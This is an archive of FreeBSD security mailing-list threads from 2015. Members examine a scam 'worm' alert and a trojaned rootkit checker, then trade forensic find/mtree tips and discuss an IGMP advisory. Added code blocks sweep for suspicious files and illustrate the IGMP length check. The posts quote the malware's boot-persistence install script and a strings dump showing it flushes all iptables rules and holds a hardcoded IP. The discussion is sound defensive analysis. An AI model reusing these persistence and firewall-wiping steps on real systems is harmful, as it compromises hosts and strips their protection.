References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>
Christopher Schulte writes:

>> On Feb 25, 2015, at 2:34 PM, Philip Jocks wrote:
>>
>> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org
>> which was registered a few days ago and looks like a tampered version of
>> chkrootkit. I hope nobody installed it anywhere; it seems to execute
>> rkcheck/tests/.unit/test.sh which contains
>>
>> #!/bin/bash
>>
>> cp tests/.unit/test /usr/bin/rrsyncn
>> chmod +x /usr/bin/rrsyncn
>> rm -fr /etc/rc2.d/S98rsyncn
>> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
>> /usr/bin/rrsyncn
>> exit

Are you looking at the tarball from the "source code" link,
http://rkcheck.org/download.php?file=rkcheck-1.4.3-src.tar.gz?

% tar -xvf rkcheck-1.4.3-src.tar.gz
x rkcheck/
x rkcheck/chkdirs.c
x rkcheck/README.chklastlog
x rkcheck/README.chkwtmp
x rkcheck/chkutmp.c
x rkcheck/chkrootkit
x rkcheck/chkrootkit.lsm
x rkcheck/check_wtmpx.c
x rkcheck/COPYRIGHT
x rkcheck/strings.c
x rkcheck/ifpromisc.c
x rkcheck/ACKNOWLEDGMENTS
x rkcheck/chklastlog.c: truncated gzip input
tar: Error exit delayed from previous errors.

I don't see a /tests/ directory or any directory under rkcheck.
Joseph

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 21:11:40 2015
From: Philip Jocks
To: Joseph Mingrone
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Wed, 25 Feb 2015 22:11:37 +0100
In-Reply-To: <864mq9ya2u.fsf@gly.ftfl.ca>
References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> <864mq9ya2u.fsf@gly.ftfl.ca>
Cc: freebsd-security@freebsd.org

> On 25.02.2015 at 22:07, Joseph Mingrone wrote:
>
> Christopher Schulte writes:
>
>>> On Feb 25, 2015, at 2:34 PM, Philip Jocks wrote:
>>>
>>> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org
>>> which was registered a few days ago and looks like a tampered version of
>>> chkrootkit. I hope nobody installed it anywhere; it seems to execute
>>> rkcheck/tests/.unit/test.sh which contains
>>>
>>> #!/bin/bash
>>>
>>> cp tests/.unit/test /usr/bin/rrsyncn
>>> chmod +x /usr/bin/rrsyncn
>>> rm -fr /etc/rc2.d/S98rsyncn
>>> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
>>> /usr/bin/rrsyncn
>>> exit
>
> Are you looking at the tarball from the "source code" link,
> http://rkcheck.org/download.php?file=rkcheck-1.4.3-src.tar.gz?
>
> % tar -xvf rkcheck-1.4.3-src.tar.gz
> x rkcheck/
> x rkcheck/chkdirs.c
> x rkcheck/README.chklastlog
> x rkcheck/README.chkwtmp
> x rkcheck/chkutmp.c
> x rkcheck/chkrootkit
> x rkcheck/chkrootkit.lsm
> x rkcheck/check_wtmpx.c
> x rkcheck/COPYRIGHT
> x rkcheck/strings.c
> x rkcheck/ifpromisc.c
> x rkcheck/ACKNOWLEDGMENTS
> x rkcheck/chklastlog.c: truncated gzip input
> tar: Error exit delayed from previous errors.
>
> I don't see a /tests/ directory or any directory under rkcheck.

the "source code" tar is broken intentionally, I guess, so that people
install the binaries. The stuff I posted was from the binary tar files
which contain shell scripts etc.
Philip

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 21:52:22 2015
From: Joseph Mingrone
To: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Wed, 25 Feb 2015 17:52:09 -0400
Message-ID: <86a901wtfa.fsf@gly.ftfl.ca>
References: <864mq9zsmm.fsf@gly.ftfl.ca> <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl>
Walter Hop writes:

> If this traffic is originating from your system, and you were running
> PHP, I'd say it's probably most likely that some PHP
> script/application on your host was compromised. Were you running
> stuff like phpMyAdmin, Wordpress or Drupal that might not have been
> updated too often?

I was running almost nothing with php except
<?php echo $_SERVER['HTTP_HOST']?> on one page. I was recently testing out
mediawiki. IIRC I installed it via the port, but uninstalled it almost
immediately. I saw today that there was still a mediawiki directory left
over with a timestamp of 2014-12-30 and one php file, LocalSettings.php.

> Often in such a compromise, the attacker leaves traces in the
> filesystem, like executable scripts or temp files. Try to look for new
> files which are owned by the webserver or fastcgi process, see if you
> find some surprises.
>
> Example:
> # touch -t 201501010000 foo
> # find / -user www -newer foo
>
> If you don't find anything, look back a little further.
> Hopefully you will find a clue in this way.

# touch -t 201412250000 foo
# find / -user www -newer foo

turned up a few directories under /var/tmp/nginx, but they were all empty.
The timestamps were the same as the mediawiki directory. Nothing
interesting turned up in the output when I uninstalled the php or
spawn-fcgi packages.
Thanks,
Joseph

From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 22:10:41 2015
From: "Ronald F. Guilmette"
To: "freebsd-security@freebsd.org"
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Wed, 25 Feb 2015 14:05:04 -0800
Message-ID: <7808.1424901904@server1.tristatelogic.com>
In-Reply-To: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>

Note: 95.215.44.195 == rkcheck.org

The web site certainly smells like a total scam... no indication whatsoever of who might be behind this allegedly helpful project. But they'd like me to just trust them and download their checker tool. Yea. Right. No thanks.

But I give them an `E' for effort.
From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 08:24:04 2015
From: Gary Palmer
To: Joseph Mingrone
Cc: freebsd-security@freebsd.org, Jung-uk Kim
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Thu, 26 Feb 2015 08:24:00 +0000
Message-ID: <20150226082400.GE29176@in-addr.com>
In-Reply-To: <86vbipycyc.fsf@gly.ftfl.ca>

On Wed, Feb 25, 2015 at 04:04:59PM -0400, Joseph Mingrone wrote:
> Jung-uk Kim writes:
>
> > On 02/25/2015 14:41, Joseph Mingrone wrote:
> >> This morning when I arrived at work I had this email from my
> >> university's IT department (via email.it) informing me that my host
> >> was infected and spreading a worm.
> >>
> >> "Based on the logs fingerprints seems that your server is infected
> >> by the following worm: Net-Worm.PHP.Mongiko.a"
> >>
> >> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST
> >> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7
> >> HTTP/1.1" 200 429 "-" "Net- Worm.PHP.Mongiko.a"
> >>
> >> Despite the surprising name, I don't see any evidence that it's
> >> related to php. I did remove php, because I don't really need it.
> >> I've included my /etc/rc.conf below. pkg audit doesn't show any
> >> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show
> >> much. I've run chkrootkit, netstat/sockstat and I don't see
> >> anything suspicious and I plan to finally put some reasonable
> >> firewall rules on this host.
> >>
> >> Do you have any suggestions? Should I include any other
> >> information here?
> > ...
> >
> > I found this:
> >
> > http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do
> >
> > Jung-uk Kim
>
> Yeah, I saw that as well. I wouldn't be concerned if this was hitting
> my web server, but the key difference here is that my IP is
> apparently the source in this case.

Did you see the part of the link that said the alert was likely a scam? Sounds to me like the people who cold call people and tell them their Windows computer is broken have moved on.

The fact your Uni's IT department sent an e-mail from email.it smells extremely suspicious to me. Why would they use a 3rd party e-mail solution instead of their own email system? Call your Uni's IT department and confirm the report came from them.
Gary

From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 09:04:21 2015
From: Karl Pielorz
To: Remko Lodder
Cc: freebsd-security@freebsd.org
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp (fwd) - ipfw fix?
Date: Thu, 26 Feb 2015 09:04:18 +0000
In-Reply-To: <1BE461E0-D2AC-4222-8D41-B7F97E83FD74@FreeBSD.org>

--On 25 February 2015 18:21 +0100 Remko Lodder wrote:

> This suggests that you can filter the traffic:
>
> Block incoming IGMP packets by protecting your host/networks with a
> firewall. (Quote from the SA).
It does, but it doesn't specifically say whether ipfw on *the host that's being protected* is sufficient. I'd imagine in some scenarios that won't work (because the host simply receiving a malformed packet would cause issues), so I was just getting it clarified that an ipfw rule on the vulnerable *host itself* blocking igmp (any to any) is sufficient in this case.

i.e. You don't need an 'external' firewall sat in front of the hosts to do that job.

-Karl

From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 09:37:24 2015
Subject: Re: has my 10.1-RELEASE system been compromised
From: Philip Jocks
In-Reply-To: <20150226082400.GE29176@in-addr.com>
Date: Thu, 26 Feb 2015 10:37:15 +0100
To: Gary Palmer
Cc: Joseph Mingrone, freebsd-security@freebsd.org, Jung-uk Kim

On 26.02.2015 at 09:24, Gary Palmer wrote:

> On Wed, Feb 25, 2015 at 04:04:59PM -0400, Joseph Mingrone wrote:
>> Jung-uk Kim writes:
>>
>>> On 02/25/2015 14:41, Joseph Mingrone wrote:
>>>> This morning when I arrived at work I had this email from my
>>>> university's IT department (via email.it) informing me that my host
>>>> was infected and spreading a worm.
>>>>
>>>> "Based on the logs fingerprints seems that your server is infected
>>>> by the following worm: Net-Worm.PHP.Mongiko.a"
>>>>
>>>> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST
>>>> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7
>>>> HTTP/1.1" 200 429 "-" "Net- Worm.PHP.Mongiko.a"
>>>>
>>>> Despite the surprising name, I don't see any evidence that it's
>>>> related to php. I did remove php, because I don't really need it.
>>>> I've included my /etc/rc.conf below. pkg audit doesn't show any
>>>> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show
>>>> much. I've run chkrootkit, netstat/sockstat and I don't see
>>>> anything suspicious and I plan to finally put some reasonable
>>>> firewall rules on this host.
>>>>
>>>> Do you have any suggestions? Should I include any other
>>>> information here?
>>> ...
>>>
>>> I found this:
>>>
>>> http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do
>>>
>>> Jung-uk Kim
>>
>> Yeah, I saw that as well. I wouldn't be concerned if this was hitting
>> my web server, but the key difference here is that my IP is
>> apparently the source in this case.
>
> Did you see the part of the link that said the alert was likely a scam?
> Sounds to me like the people who cold call people and tell them their Windows
> computer is broken have moved on.

The thing about the scam was posted by a friend after Joseph's post to the freebsd-security mailing list so people on stackexchange will be warned as well.

Philip

From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 15:40:10 2015
From: Ian Smith
To: Christopher Schulte
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Fri, 27 Feb 2015 02:40:05 +1100 (EST)
Message-ID: <20150227022821.P38620@sola.nimnet.asn.au>
In-Reply-To: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>
Cc: Joseph Mingrone, "freebsd-security@freebsd.org", Philip Jocks

On Wed, 25 Feb 2015 20:55:43 +0000, Christopher Schulte wrote:
> > On Feb 25, 2015, at 2:34 PM, Philip Jocks wrote:
> >
> > it felt pretty scammy to me, googling for the "worm" got me to
> > rkcheck.org which was registered a few days ago and looks like a
> > tampered version of chkrootkit. I hope nobody installed it anywhere;
> > it seems to execute rkcheck/tests/.unit/test.sh which contains
> >
> > #!/bin/bash
> >
> > cp tests/.unit/test /usr/bin/rrsyncn
> > chmod +x /usr/bin/rrsyncn
> > rm -fr /etc/rc2.d/S98rsyncn
> > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> > /usr/bin/rrsyncn
> > exit
> >
> > That doesn't look like something you'd want on your box...
>
> I filed a report with Google about that domain (Google Safe
> Browsing), briefly describing what's been recounted here on this
> thread. It seems quite suspicious, agreed.
>
> Has anyone started an analysis of the rrsyncn binary? The last few
> lines of a simple string dump are interesting... take note what looks
> to be an IP address of 95.215.44.195.
>
> /bin/sh
> iptables -X 2> /dev/null
> iptables -F 2> /dev/null
> iptables -t nat -F 2> /dev/null
> iptables -t nat -X 2> /dev/null
> iptables -t mangle -F 2> /dev/null
> iptables -t mangle -X 2> /dev/null
> iptables -P INPUT ACCEPT 2> /dev/null
> iptables -P FORWARD ACCEPT 2> /dev/null
> iptables -P OUTPUT ACCEPT 2> /dev/null
> udevd
> 95.215.44.195
> ;*3$"
>
> > Cheers,
> >
> > Philip
>
> Chris

Seeing as no one's mentioned it yet .. if your (linux) box were running iptables - a reasonable assumption - then running those commands would remove and flush all your rules, leaving you with a firewall that accepted everything, as good as no firewall at all. And then .. ?

At least FreeBSD isn't the lowest hanging fruit for these monkeys ..

cheers, Ian

From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 18:02:59 2015
From: Mark Felder
To: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Thu, 26 Feb 2015 12:02:52 -0600
Message-ID: <1424973772.4085078.232885457.0277C7ED@webmail.messagingengine.com>
In-Reply-To: <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl>

On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote:
>
> Example:
> # touch -t 201501010000 foo
> # find / -user www -newer foo
>
> If you don’t find anything, look back a little further.
> Hopefully you will find a clue in this way.
>

Thanks for posting this trick -- I've never considered it before and will certainly put it in my toolbox!
From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 20:12:45 2015
From: Glyn Grinstead
To: Mark Felder
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Thu, 26 Feb 2015 20:12:34 +0000
Message-ID: <20150226201234.GA1920@dhole.grinstead.net>
In-Reply-To: <1424973772.4085078.232885457.0277C7ED@webmail.messagingengine.com>
Cc: freebsd-security@freebsd.org

On Thu, 26 Feb 2015 at 12:02:52 -0600, Mark Felder wrote:
> On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote:
> >
> > Example:
> > # touch -t 201501010000 foo
> > # find / -user www -newer foo
>
> Thanks for posting this trick -- I've never considered it before and
> will certainly put it in my toolbox!

While Walter is correct to give the universal form, if you know your system supports the -newerXY option you can skip the temporary file and use:

# find / -user www -newermt 2015-01-01

Find is a fun program to get to grips with to spot odd things going on. There's a tendency to assume you need to know what you're looking for in the first place, but you can also tell it to show you things you don't know about:

Files with an unknown user or group (tidying up after restoring partially from a backup, or spotting hacks that weren't quite elegant enough):

# find / -nouser -o -nogroup

I know my $PATH will have executables in it, and some other directories are almost certain to contain executables as well. But where are there executables that aren't in the usual places (maybe hacks, maybe users riding roughshod across the system installing things in strange places to trip people up later when they don't get patched)?
# find -E / -type d -regex "`echo $PATH | sed -e \"s/:/\|/g\"`|/usr/libexec|/boot|/usr/src|/usr/local/etc/rc.d|/usr/local/lib|/usr/local/libexec|/usr/ports/.*/work|/usr/obj|/rescue|/etc/rc.d|/etc/periodic|/libexec" -prune -o -type f -perm +111 -print

And you can combine them, of course: modified since 1st Jan 2015, a regular file and executable:

# find / -newermt 2015-01-01 -type f -perm +111

Glyn.
(Something of a fan of find :-)

From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 20:43:25 2015
Message-ID: <1424983403.4117041.232953973.212CCED4@webmail.messagingengine.com>
From: Mark Felder
To: Glyn Grinstead
Cc: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Thu, 26 Feb 2015 14:43:23 -0600
In-Reply-To: <20150226201234.GA1920@dhole.grinstead.net>

On Thu, Feb 26, 2015, at 14:12, Glyn Grinstead wrote:
> On Thu, 26 Feb 2015 at 12:02:52 -0600, Mark Felder wrote:
> > On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote:
> > >
> > > Example:
> > > # touch -t 201501010000 foo
> > > # find / -user www -newer foo
> >
> > Thanks for posting this trick -- I've never considered it before and
> > will certainly put it in my toolbox!
>
> While Walter is correct to give the universal form, if you know your
> system supports the -newerXY option you can skip the temporary file and use:
>
> # find / -user www -newermt 2015-01-01
>
> Find is a fun program to get to grips with to spot odd things going on.
> There's a tendency to assume you need to know what you're looking for in
> the first place, but you can also tell it to show you things you don't
> know about:
>
> Files with an unknown user or group (tidying up after restoring partially
> from a backup, or spotting hacks that weren't quite elegant enough):
>
> # find / -nouser -o -nogroup
>
> I know my $PATH will have executables in it, and some other directories
> are almost certain to contain executables as well. But where are there
> executables that aren't in the usual places (maybe hacks, maybe users
> riding roughshod across the system installing things in strange places to trip
> people up later when they don't get patched)?
>
> # find -E / -type d -regex "`echo $PATH | sed -e
> \"s/:/\|/g\"`|/usr/libexec|/boot|/usr/src|/usr/local/etc/rc.d|/usr/local/lib|/usr/local/libexec|/usr/ports/.*/work|/usr/obj|/rescue|/etc/rc.d|/etc/periodic|/libexec"
> -prune -o -type f -perm +111 -print
>
> And you can combine them, of course: modified since 1st Jan 2015, a
> regular file and executable:
>
> # find / -newermt 2015-01-01 -type f -perm +111
>
> Glyn.
> (Something of a fan of find :-)

Please partner with MW Lucas and write a "find mastery" to document all of these clever uses of find. (I'd read it.)
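The find(1) sweeps Walter and Glyn describe above (and Mark quotes), packaged as reusable shell functions. This is an added example written for this archive, not code posted in the thread. It assumes a GNU or BSD find that understands -newermt, spells the "has an execute bit" test as the POSIX -perm -u+x rather than FreeBSD's -perm +111, and the list of directories expected to hold executables is a constructed default to be edited per host.

```sh
#!/bin/sh
# Added example: the find(1) idioms from the thread as reusable functions.
# Not code from the thread; the prune list below is a constructed default.

# Directories that are expected to hold executables. Anything executable
# found outside these is worth a second look. Edit per host (constructed).
EXPECTED_EXEC_DIRS="/bin /sbin /usr/bin /usr/sbin /usr/libexec /usr/local/bin \
/usr/local/sbin /usr/local/libexec /usr/local/etc/rc.d /usr/local/lib \
/rescue /boot /etc/rc.d /etc/periodic /libexec /usr/src /usr/obj"

# Walter's portable form: regular files under $1 owned by $2 and modified
# after $3 (touch -t format, [[CC]YY]MMDDhhmm). Works with any POSIX find
# because it compares against a temporary reference file rather than a date.
recent_files_owned_by() {
    dir=$1; owner=$2; stamp=$3
    ref=$(mktemp) || return 1
    touch -t "$stamp" "$ref" || { rm -f "$ref"; return 1; }
    find "$dir" -user "$owner" -type f -newer "$ref" -print
    status=$?
    rm -f "$ref"
    return $status
}

# Glyn's -newerXY form combined with his prune idea: regular, owner-executable
# files modified since $2 (YYYY-MM-DD) that live outside EXPECTED_EXEC_DIRS.
# -newermt is a GNU/BSD extension; -perm -u+x is the POSIX spelling of the
# execute-bit test that the thread writes as -perm +111.
recent_executables_outside_expected() {
    dir=$1; since=$2
    prune=""
    for d in $EXPECTED_EXEC_DIRS; do
        prune="$prune -path $d -prune -o"
    done
    # $prune is intentionally unquoted so it expands into separate arguments.
    # shellcheck disable=SC2086
    find "$dir" $prune -type f -perm -u+x -newermt "$since" -print
}

# Files whose uid or gid no longer maps to a name in passwd/group.
files_without_owner_or_group() {
    find "$1" \( -nouser -o -nogroup \) -print
}

# Usage (as root, on the host being examined):
#   recent_files_owned_by / www 201412250000
#   recent_executables_outside_expected / 2015-01-01
#   files_without_owner_or_group /
```

The prune list is deliberately a variable rather than a regex so that a site can shorten it; every directory removed from it widens the sweep. Anything these functions print is a lead, not a verdict: a legitimately updated package will show up too, so check hits against the package database before drawing conclusions.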
From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 20:52:21 2015
Message-ID: <1424983940.4119761.232957121.03701F8A@webmail.messagingengine.com>
From: Malcolm Herbert
To: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Fri, 27 Feb 2015 07:52:20 +1100
In-Reply-To: <20150226201234.GA1920@dhole.grinstead.net>

I'd also suggest you take a look at using mtree for tripwire-like functionality into the future - its primary purpose is to be able to take the specification for a directory tree and either report differences or make the filesystem conform to the specification.

Not sure whether it is used in the base FreeBSD system, but it's definitely part of NetBSD, where it is used to confirm the permissions and other metadata information for files from each of the release tarballs and (iirc) runs once a week as part of normal system cron.

mtree can also be turned on a directory tree to capture a specification that matches it ...
it is better than find in this instance for comparing the state of a filesystem over time as it can be set to calculate file digests by a variety of algorithms and produce output that can be parsed and compared against later (which can be difficult with the -ls output from find).

I also found a copy of it to run on Solaris to confirm that changes we were making to our source only had the desired impacts to large application data sets as part of our upgrade process.

Plus, until I mentioned it here, it might have been obscure enough for it not to be trojanned by a rootkit ... :)

Hope that helps,

Malcolm
--
Malcolm Herbert
mjch@mjch.net

From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 20:58:09 2015
From: Mark Felder
To: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Thu, 26 Feb 2015 14:58:07 -0600
Message-ID: <1424984287.4120744.232959461.2199527B@webmail.messagingengine.com>
In-Reply-To: <1424983940.4119761.232957121.03701F8A@webmail.messagingengine.com>

On Thu, Feb 26, 2015, at 14:52, Malcolm Herbert wrote:
> I'd also suggest you take a look at using mtree for tripwire-like
> functionality into the future - its primary purpose is to be able to
> take the specification for a directory tree and either report
> differences or make the filesystem conform to the specification.
>
> not sure whether it is used in the base FreeBSD system but it's
> definitely part of NetBSD where it is used to confirm the permissions
> and other metadata information for files from each of the release
> tarballs and (iirc) runs once a week as part of normal system cron
>
> mtree can also be turned on a directory tree to capture a specification
> that matches it ...
it is better than find in this instance for > comparing the state of a filesystem over time as it can be set to > calculate file digests by a variety of algorithms and produce output > that can be parsed and compared against later (which can be difficult > with the -ls output from find) > > I also found a copy of it to run on Solaris to confirm that changes we > were making to our source only had the desired impacts to large > application data sets as part of our upgrade process > > plus until I mentioned it here, it might have been obscure enough for > it not to be trojanned by a rootkit ... :) mtree is a really handy tool. I especially love it for large changes like changing the UIDs and GIDs for a lot of accounts. If you take an mtree dump, change the UIDs and GIDs, and re-apply the mtree dump it will quickly fix the permissions across your server because it stores the user and group names, not the IDs. I wish mtree was readily available on Linux. From owner-freebsd-security@FreeBSD.ORG Fri Feb 27 23:32:48 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 321AEB65 for ; Fri, 27 Feb 2015 23:32:48 +0000 (UTC) Received: from mail-la0-x235.google.com (mail-la0-x235.google.com [IPv6:2a00:1450:4010:c03::235]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id AA35FC7A for ; Fri, 27 Feb 2015 23:32:47 +0000 (UTC) Received: by labhs14 with SMTP id hs14so20527965lab.4 for ; Fri, 27 Feb 2015 15:32:45 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:date:message-id:subject:from:to:content-type; bh=ylBIsPtYr5qFxG47tBRKqF0bpkcWv1NwjXbboxmn1NM=; 
b=Zdja9uvmGRTqBxdXvlgjnVk88seTzC+OUcQPYkeCIEjl1MFv8C7A+n0/Wr5mGIHvJO JUwB29jLhYGyCBlo2YHxe6853L3v52UuFkj7un/idvn+YcyZUBCWwp73Z0/ssODjIc00 8D9vNDg+R0XxAQAlr9b8HNzUQyl7KkKIvHiOxWnE36Z+yIAeOtUXoJB3rLsA65ipwWO7 KZ1IBIffWFyxJAW83YPU1SP6/L9ZMTqEmGCFuq2rMCGJq6pimbU/1kgZpfyjedaALqYh 7Ddz8hlLB+/INGg+zSPeISZFYDEh6SeQf6yZmefRiSYsUre5lV559toYRvWLGij4d1KY KPUQ== MIME-Version: 1.0 X-Received: by 10.112.51.114 with SMTP id j18mr14476666lbo.97.1425079965297; Fri, 27 Feb 2015 15:32:45 -0800 (PST) Received: by 10.113.11.165 with HTTP; Fri, 27 Feb 2015 15:32:45 -0800 (PST) Date: Fri, 27 Feb 2015 15:32:45 -0800 Message-ID: Subject: Requesting clarification for FreeBSD-SA-15:04.igmp From: Shawn Hoffman To: freebsd-security@freebsd.org Content-Type: text/plain; charset=UTF-8 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 27 Feb 2015 23:32:48 -0000 Hi, I would like more clarification to be provided about who/what is affected by this patch. As we can see, amd64 is not affected: ( 9.3-RELEASE, md5 c4605d83b454c7633149a4eb3baa8b83 ) .text:FFFFFFFF80A04AA6 mov r14, [rbp+var_88] .text:FFFFFFFF80A04AAD add cs:igmpstat_0.igps_rcv_v3_queries, 1 .text:FFFFFFFF80A04AB5 movzx ecx, word ptr [r14+0Ah] .text:FFFFFFFF80A04ABA rol cx, 8 .text:FFFFFFFF80A04ABE movzx ebx, cx ; rbx = ((u64)(u16)ntohs(igmp_numsrc)) << 2 .text:FFFFFFFF80A04AC1 shl rbx, 2 ; rdi = (u16)(((u64)(u16)ntohs(igmp_numsrc)) << 2) .text:FFFFFFFF80A04AC5 movzx edi, bx .text:FFFFFFFF80A04AC8 mov ecx, ebx .text:FFFFFFFF80A04ACA cmp rbx, rdi ; u64 compare .text:FFFFFFFF80A04ACD ja fail_igps_rcv_tooshort This is because the result type of ntohs is the same as uint16_t, and the result of sizeof() is size_t. Because of this, 32bit x86 should not be vulnerable either. 
I can only assume platforms where the int type is <= 16bits may actually be vulnerable. I have no idea if freebsd actually uses such configurations. I think this information should be clarified in the security advisories (which in this case, only give explicit details on how to patch "a RELEASE version of FreeBSD on the i386 or amd64 platforms" - which are not affected afaict). -Shawn
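The type-width argument in Shawn's message, worked through in C as an added example. This is illustration code written for this archive page, not the FreeBSD kernel source and not anything from the advisory: it models the product of a uint16_t source count and sizeof(in_addr_t) under C's usual arithmetic conversions, the compare-against-truncation that the amd64 disassembly above performs, and a length check that does not depend on the width of int. The field offset 0x0A is taken from the disassembly (word ptr [r14+0Ah], which is where igmp_numsrc sits in struct igmpv3); the constructed query header and the function names are assumptions for the example, and v3_query_sources_fit is a hypothetical form of the check, not the kernel's.

```c
/* Added example, not from the list post or the FreeBSD source tree. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SRC_SIZE ((size_t)4)          /* sizeof(in_addr_t) */
#define IGMPV3_NUMSRC_OFFSET 0x0A     /* offset loaded in the disassembly */

/* ntohs() as the disassembly does it: load the 16-bit field and byte-swap
 * (the rol cx, 8). Result type is uint16_t, just as Shawn notes. */
uint16_t read_numsrc(const uint8_t *igmpv3_hdr) {
    return (uint16_t)((igmpv3_hdr[IGMPV3_NUMSRC_OFFSET] << 8) |
                       igmpv3_hdr[IGMPV3_NUMSRC_OFFSET + 1]);
}

/* The product exactly as C evaluates it: the uint16_t operand is promoted to
 * int and then converted to size_t, so on amd64 (64-bit size_t) and i386
 * (32-bit size_t) the multiply happens at full width and cannot wrap for any
 * 16-bit source count (max 65535 * 4 = 262140). */
size_t numsrc_bytes_size_t(uint16_t nsrc) {
    return nsrc * SRC_SIZE;
}

/* The same arithmetic forced into 16 bits: this is what a platform with a
 * 16-bit size_t would compute, or what storing the product in a uint16_t
 * does. Any nsrc >= 0x4000 wraps here. */
uint16_t numsrc_bytes_u16(uint16_t nsrc) {
    return (uint16_t)(nsrc * SRC_SIZE);
}

/* Mirrors the amd64 sequence: rbx holds the full-width product, rdi its
 * 16-bit truncation, and "cmp rbx, rdi / ja tooshort" rejects the packet
 * whenever the two differ, i.e. whenever the product does not fit 16 bits. */
bool numsrc_fits_u16(uint16_t nsrc) {
    size_t   full      = numsrc_bytes_size_t(nsrc);
    uint16_t truncated = numsrc_bytes_u16(nsrc);
    return !(full > truncated);
}

/* A width-independent way to bound the source list (hypothetical check, not
 * the kernel's): compute in size_t and compare against the bytes that are
 * actually present after the fixed 12-byte IGMPv3 query header. */
bool v3_query_sources_fit(uint16_t nsrc, size_t bytes_after_header) {
    return numsrc_bytes_size_t(nsrc) <= bytes_after_header;
}

/* Constructed 12-byte IGMPv3 membership query header (type 0x11) whose
 * igmp_numsrc field (offset 0x0A, network byte order) is 0x4000: the smallest
 * count whose 4-byte-per-source length no longer fits in 16 bits. */
static const uint8_t constructed_query[12] = {
    0x11, 0x64, 0x00, 0x00,   /* type, max resp code, checksum (unset) */
    0x00, 0x00, 0x00, 0x00,   /* group address */
    0x02, 0x7d,               /* misc (S/QRV), QQIC */
    0x40, 0x00                /* igmp_numsrc = 0x4000 */
};

int main(void) {
    uint16_t nsrc = read_numsrc(constructed_query);
    uint16_t samples[] = { 3, 0x3FFF, nsrc, 0xFFFF };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint16_t n = samples[i];
        printf("numsrc=%5u size_t product=%6zu u16 product=%5u fits16=%d\n",
               n, numsrc_bytes_size_t(n), numsrc_bytes_u16(n),
               numsrc_fits_u16(n));
    }
    return 0;
}
```

Running it shows the two products agreeing up to numsrc 0x3FFF and diverging from 0x4000 on, which is the condition the disassembled compare catches; the point of the last function is that bounding the count by the bytes really present makes the check correct regardless of how wide int or size_t happens to be.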